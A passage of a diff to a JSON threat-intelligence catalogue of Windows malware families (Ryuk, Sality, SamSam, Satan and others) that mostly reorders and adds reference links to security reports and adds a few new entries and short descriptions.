"https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", - "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", - "https://community.riskiq.com/article/0bcefe76", - "https://twitter.com/Prosegur/status/1199732264386596864", - "https://twitter.com/anthomsec/status/1321865315513520128", - "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021", - "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", - "https://blog.cyberint.com/ryuk-crypto-ransomware", - "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf", - "https://www.youtube.com/watch?v=CgDtm05qApE", + "https://arcticwolf.com/resources/blog/karakurt-web", "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/", - "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", - "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html", - "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/", - "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", - "https://twitter.com/ffforward/status/1324281530026524672", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", - "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", - "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/", - "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", - "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", - "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.youtube.com/watch?v=7xxRunBP5XA", - "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", - "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", - "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", - "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/", - "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", - "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", - "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", - "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/", - "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", - "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/", - "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", - "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/", "https://twitter.com/SecurityJoes/status/1402603695578157057", - "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html", - "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", - "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html", - "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc", - "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf", - "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders", - "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/", - "https://twitter.com/IntelAdvanced/status/1356114606780002308", - "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/", - "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", - "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/", - "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", - "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/", - "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/", + "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", + "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider", + "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/", "https://blog.reversinglabs.com/blog/hunting-for-ransomware", - "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP", - "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/", - "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/", - "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/", - "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/", - "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/" + "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/", + "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/", + "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/", + "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf" ], "synonyms": [], "type": [] @@ -42602,10 +44618,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer", + "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/", "https://analyst1.com/file-assets/Nationstate_ransomware_with_consecutive_endnotes.pdf", - "https://twitter.com/VK_Intel/status/1171782155581689858", "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/", - "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/" + "https://twitter.com/VK_Intel/status/1171782155581689858" ], "synonyms": [ "Sidoh" @@ -42672,11 +44688,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", - "https://www.cert.pl/en/news/single/sage-2-0-analysis/", + "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", "http://malware-traffic-analysis.net/2017/10/13/index.html", - "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", + "https://www.cert.pl/en/news/single/sage-2-0-analysis/", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", - "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga" + "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/" ], "synonyms": [ "Saga" @@ -42705,13 +44721,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot", - "https://www.cyberscoop.com/ukrainian-cyber-attacks-russia-conflict-q-and-a/", "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/", - "https://unit42.paloaltonetworks.com/atoms/nascentursa/", + "https://www.cyberscoop.com/ukrainian-cyber-attacks-russia-conflict-q-and-a/", "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", + "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/", "https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/", "https://cert.gov.ua/article/18419", - "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/" + "https://unit42.paloaltonetworks.com/atoms/nascentursa/" ], "synonyms": [], "type": [] @@ -42724,11 +44740,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.saitama", - "https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html", - "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html", - "https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738", + "https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/", "https://www.fortinet.com/blog/threat-research/please-confirm-you-received-our-apt", - "https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/" + "https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html", + "https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738", + "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html" ], "synonyms": [ "AMATIAS", @@ -42744,15 +44760,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", - "https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654", - "https://www.secureworks.com/research/sakula-malware-family", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", - "https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group", "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf", - "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", + "https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group", + "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", + "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", + "https://www.secureworks.com/research/sakula-malware-family" ], "synonyms": [ "Sakurel" @@ -42767,9 +44783,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", - "https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/", + "https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware", "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf", - "https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware" + "https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/" ], "synonyms": [ "BadCake" @@ -42784,15 +44800,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", - "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://unit42.paloaltonetworks.com/c2-traffic/", - "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://www.mandiant.com/resources/pe-file-infecting-malware-ot", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf", + "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf", "https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", "https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" + "https://unit42.paloaltonetworks.com/c2-traffic/" ], "synonyms": [], "type": [] @@ -42801,7 +44817,7 @@ "value": "Sality" }, { - "description": "", + "description": "According to PCrisk, SamoRAT is a Remote Access Trojan (RAT), a type of malware that allows the cyber criminals responsible to monitor and control the infected computer. In most cases, RATs are used to steal sensitive information and/or install other malware onto the infected computer. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samo_rat", @@ -42814,39 +44830,39 @@ "value": "SamoRAT" }, { - "description": "", + "description": "According to PCrisk, Samsam is high-risk ransomware designed to infect unpatched servers and encrypt files stored on computers networked to the infected server.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf", - "https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/", - "https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit", - "https://www.secureworks.com/research/threat-profiles/gold-lowell", - "https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/", "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://www.secureworks.com/research/samsam-ransomware-campaigns", + "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/", + "https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/", + "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", + "http://blog.talosintel.com/2016/03/samsam-ransomware.html", + "https://www.secureworks.com/research/threat-profiles/gold-lowell", + "https://www.secureworks.com/blog/samas-ransomware", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", + "https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.secureworks.com/blog/ransomware-deployed-by-adversary", "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://www.justice.gov/opa/press-release/file/1114746/download", - "https://www.secureworks.com/blog/samas-ransomware", - "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/", - "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", - "https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/", - "https://www.secureworks.com/blog/ransomware-deployed-by-adversary", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/", + "https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/", + "https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/", + "https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit", "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", - "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", - "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", - "https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/", - "http://blog.talosintel.com/2016/03/samsam-ransomware.html", - "https://www.secureworks.com/research/samsam-ransomware-campaigns" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", + "https://www.justice.gov/opa/press-release/file/1114746/download" ], "synonyms": [ "Samas" @@ -42883,16 +44899,29 @@ "uuid": "32e9c2ce-08a6-47ee-8636-ea83711930b1", "value": "SapphireMiner" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sapphire_stealer", + "https://github.com/0day2/SapphireStealer/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e1b2b792-033a-438d-a9c4-4d2adf1abb43", + "value": "SapphireStealer" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache", - "https://blog.alyac.co.kr/m/2219", "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf", + "https://blog.alyac.co.kr/m/2219", + "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html", "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails", - "https://blog.alyac.co.kr/2219", - "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html" + "https://blog.alyac.co.kr/2219" ], "synonyms": [], "type": [] @@ -42905,9 +44934,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", + "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html", "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", - "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a" ], "synonyms": [ "ENDCMD", @@ -42923,13 +44952,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis", - "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/", - "https://www.symantec.com/security-center/writeup/2010-020210-5440-99", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx", "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/", - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis" + "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/", + "https://www.symantec.com/security-center/writeup/2010-020210-5440-99", + "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/" ], "synonyms": [ "Oficla" @@ -42939,19 +44968,34 @@ "uuid": "4c4ceb45-b326-45aa-8f1a-1229e90c78b4", "value": "Sasfis" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom", + "https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/" + ], + "synonyms": [ + "LegionLoader" + ], + "type": [] + }, + "uuid": "b08af3b5-2453-4d4b-972a-32e6602410f2", + "value": "Satacom" + }, { "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", - "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", - "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/", - "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/", "https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html", "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2", - "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", + "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/", + "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/", "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html", - "https://www.sangfor.com/source/blog-network-security/1094.html" + "https://www.sangfor.com/source/blog-network-security/1094.html", + "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", + "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread" ], "synonyms": [ "5ss5c", @@ -42964,12 +45008,12 @@ "value": "Satan" }, { - "description": "", + "description": "According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer\u2019s master boot record (MBR) and prevents it from starting.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", - "https://www.cylance.com/threat-spotlight-satan-raas", - "https://blog.reversinglabs.com/blog/retread-ransomware" + "https://blog.reversinglabs.com/blog/retread-ransomware", + "https://www.cylance.com/threat-spotlight-satan-raas" ], "synonyms": [], "type": [] @@ -42996,8 +45040,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", - "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", - "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" + "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/", + "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/" ], "synonyms": [], "type": [] @@ -43010,9 +45054,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", - "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md", + "https://securitykitten.github.io/2016/11/15/scanpos.html", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", - "https://securitykitten.github.io/2016/11/15/scanpos.html" + "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md" ], "synonyms": [], "type": [] @@ -43042,9 +45086,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom", - "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "http://malware-traffic-analysis.net/2017/11/23/index.html", + "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf" ], "synonyms": [], @@ -43071,8 +45115,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", - "https://github.com/vithakur/schneiken", - "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb" + "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", + "https://github.com/vithakur/schneiken" ], "synonyms": [], "type": [] @@ -43086,8 +45130,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363", - "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/" ], "synonyms": [], @@ -43154,8 +45198,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scrubcrypter", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive", - "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/" + "https://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/", + "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive" ], "synonyms": [], "type": [] @@ -43168,29 +45213,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", - "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - 